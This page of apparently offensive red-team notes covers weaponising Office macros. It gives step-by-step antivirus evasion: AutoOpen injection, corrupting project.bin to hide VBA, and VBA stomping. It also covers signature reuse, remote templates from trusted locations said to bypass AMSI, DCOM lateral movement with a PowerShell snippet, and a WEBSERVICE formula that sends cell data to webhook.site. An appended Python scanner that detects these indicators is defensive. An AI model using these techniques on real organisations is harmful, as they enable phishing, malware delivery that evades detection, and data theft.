# Macros / VBA

{% embed url="https://bettersolutions.com/vba/ribbon/OfficeCustomUIEditorFiles.zip" %}

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FVtokjgnoxTOupcPp2rul%2Fimage.png?alt=media&#x26;token=d6e03248-919a-4126-a0ff-4be70daee9f3" alt=""><figcaption></figcaption></figure>

In `vbaData.xml`, `MacroName=` shows whether an AutoOpen macro is registered, and `wne:name` is the entry that executes it.

Macros are more than VBA: Excel 4.0 macros (XLM) also exist, but only in Excel.

VBA has two intermediate languages: P-Code and Exe-Code.

Every module stream starts with a PerformanceCache (which should be empty).

Approaches that have worked well:

1. abuse ambiguity in the specs (e.g. the ASCII and Unicode name fields pointing to the same module stream)
2. explore undocumented features (Ctrl-F the specs for "must be ignored" and "must not be present")
3. try deviating from the specs

## AV Bypass:

#### Add AutoOpen:

1. open the document in 7-Zip > word > vbaData.xml
2. change the name in MacroName to name.AUTOOPEN
3. extract project.bin and load it into FlexHex
4. select the stream/module name and press Ctrl-X, which removes the project stream from the bin file
5. drop it back into 7-Zip and replace the old one

#### Stop VBA reader from viewing:

1. download the project.bin again from 7-Zip
2. open it in FlexHex as a normal file
3. keep the magic bytes of the file and overwrite some of the data (basically to crash the bin when it gets executed)

{% embed url="https://vbastomp.com" %}

Mark of the Web and Trust:

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FNxvYn8EVoUFlOcVKgIN8%2Fimage.png?alt=media&#x26;token=323ebf06-8452-445a-82e5-cf1aef38cf54" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FB4bwVkERgivLrVGfcALy%2Fimage.png?alt=media&#x26;token=f9c23574-f97c-4749-b94e-323fef688c6e" alt=""><figcaption></figcaption></figure>

If we also have a file from the target, we can reuse the signing from that file by injecting our payload into it.

### Signature Abuse:

Some orgs use 'Mail Merge' from an Excel address list to automate work and send personalised letters.

If a document is signed, we can execute VBA that is already signed (if enabled by the company).

In Excel as well, to avoid static analysis, call the VBA function from within a cell, i.e. =PrintDocument()

We can then, within the Word document, create a new macro called autoopen(), and when the code is re-run it will execute automatically, avoiding all detection.

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2Flkzuvn4YnygOAcUiOMZu%2Fimage.png?alt=media&#x26;token=74062ff8-0a15-42eb-b73a-5d7ed8839b57" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FxZog3LnyVEVnwWoaph65%2Fimage.png?alt=media&#x26;token=88e21189-5fa3-4ce5-930c-42f711bb430f" alt=""><figcaption></figcaption></figure>

COM/DCOM exploit:

## Trusted location:

Use a trusted location to host a template, then reference that template from the document used to phish.

This method avoids all macro settings, AMSI and all other security settings within Office.

{% embed url="https://netero1010-securitylab.com/evasion/execution-of-remote-vba-script-in-excel" %}

Lateral movement: from system A, with admin on system B, start Excel on B via DCOM and force it to execute an Excel document.

```powershell
$a = [System.Activator]::CreateInstance([type]:
$a.RegisterXLL("C:\FilePath\")
```

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2FWjvybLfWrzTTbAxd8rRg%2Fimage.png?alt=media&#x26;token=e9c68052-bf78-42cd-8ae0-bc891f8a5259" alt=""><figcaption></figcaption></figure>

PST extension is normally disregarded by AV.

Playing with fields:

1. open document -> Insert -> Fields
2. MacroButton ->

<figure><img src="https://1422073608-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJ6mTp74lZCen0Sx5qHUb%2Fuploads%2F1nwUInA02cOahfk0IJs9%2Fimage.png?alt=media&#x26;token=44e5b56d-b55c-46ad-99ba-299030e42fe8" alt=""><figcaption></figcaption></figure>

Information leaking via DNS ->

Get Data -> From Folder

Refresh -> Connection Properties -> Refresh on open, etc.

Navigate to the Advanced Editor -> `res = Table.SelectRows(Source, each Text.Contains([Name], "dll"))`

call home:

```excel-formula
=webservice("https://webhook.site/APIkey?"&encodeurl(A1))
```
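As an added, defensive example (not code from these notes), a small Python scanner that pulls the indicators this page describes out of an OOXML file: a `vbaProject.bin` part, an auto-executing `wne:macroName` in `vbaData.xml`, and WEBSERVICE/ENCODEURL cell formulas. The sample document is constructed inline; the auto-exec name list and the `wne:name` value are assumptions.

```python
import io
import re
import zipfile

# Macro names Office runs on its own when a document is opened (assumption: the
# classic set; extend it for the applications you care about).
AUTO_EXEC = re.compile(r"(?:^|\.)(auto_?open|autoexec|document_open|workbook_open)$", re.I)
# wne:macroName="Project.Module.Name" entries inside word/vbaData.xml
MACRO_NAME = re.compile(r'wne:macroName="([^"]+)"')
# Cell formulas inside xl/worksheets/*.xml live in <f> elements
FORMULA = re.compile(r"<f(?:\s[^>]*)?>(.*?)</f>", re.S)
# Excel functions that make a cell reach out over HTTP
CALL_HOME = ("WEBSERVICE(", "ENCODEURL(")

def scan_office_zip(data: bytes) -> list:
    """Return (finding, detail) pairs for an OOXML blob (docx/docm/xlsx/xlsm)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for part in z.namelist():
            if part.endswith("vbaProject.bin"):
                findings.append(("vba-project", part))  # macros are present at all
            elif part.endswith("vbaData.xml"):
                for name in MACRO_NAME.findall(z.read(part).decode("utf-8", "replace")):
                    if AUTO_EXEC.search(name):
                        findings.append(("auto-exec-macro", name))
            elif part.startswith("xl/worksheets/") and part.endswith(".xml"):
                for f in FORMULA.findall(z.read(part).decode("utf-8", "replace")):
                    if any(fn in f.upper() for fn in CALL_HOME):
                        findings.append(("call-home-formula", f))
    return findings

def build_sample() -> bytes:
    """Constructed sample only: Word and Excel parts are mixed into one zip so
    every check fires; a real file carries either word/ or xl/ parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 8)
        z.writestr("word/vbaData.xml",
                   '<wne:vbaSuppData xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">'
                   '<wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="wne:AutoOpen"/>'
                   '</wne:mcds></wne:vbaSuppData>')
        z.writestr("xl/worksheets/sheet1.xml",
                   '<worksheet><sheetData><row r="1"><c r="B1">'
                   '<f>WEBSERVICE("https://example.invalid/?"&amp;ENCODEURL(A1))</f>'
                   '</c></row></sheetData></worksheet>')
    return buf.getvalue()

if __name__ == "__main__":
    for kind, detail in scan_office_zip(build_sample()):
        print(f"{kind}: {detail}")
```

Run it against a real `.docm`/`.xlsm` by passing the file's bytes to `scan_office_zip`; an auto-exec name plus a call-home formula in the same file is a strong triage signal.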
